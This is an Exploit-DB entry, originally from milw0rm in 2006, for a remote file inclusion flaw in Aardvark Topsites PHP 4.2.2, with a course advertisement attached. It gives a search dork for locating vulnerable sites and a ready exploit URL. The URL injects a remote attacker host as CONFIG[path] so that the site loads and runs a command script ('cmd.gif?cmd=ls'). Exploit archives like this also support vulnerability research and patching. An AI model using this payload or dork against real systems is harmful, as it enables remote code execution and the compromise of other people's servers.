Aardvark Topsites PHP 4.2.2 - 'path' Remote File Inclusion

EDB-ID:

1730


Author:

[Oo]

Type:

webapps


Platform:

PHP

Date:

2006-04-30


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
URL: http://www.aardvarktopsitesphp.com/
Dork: "Powered By Aardvark Topsites PHP 4.2.2"

Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-30]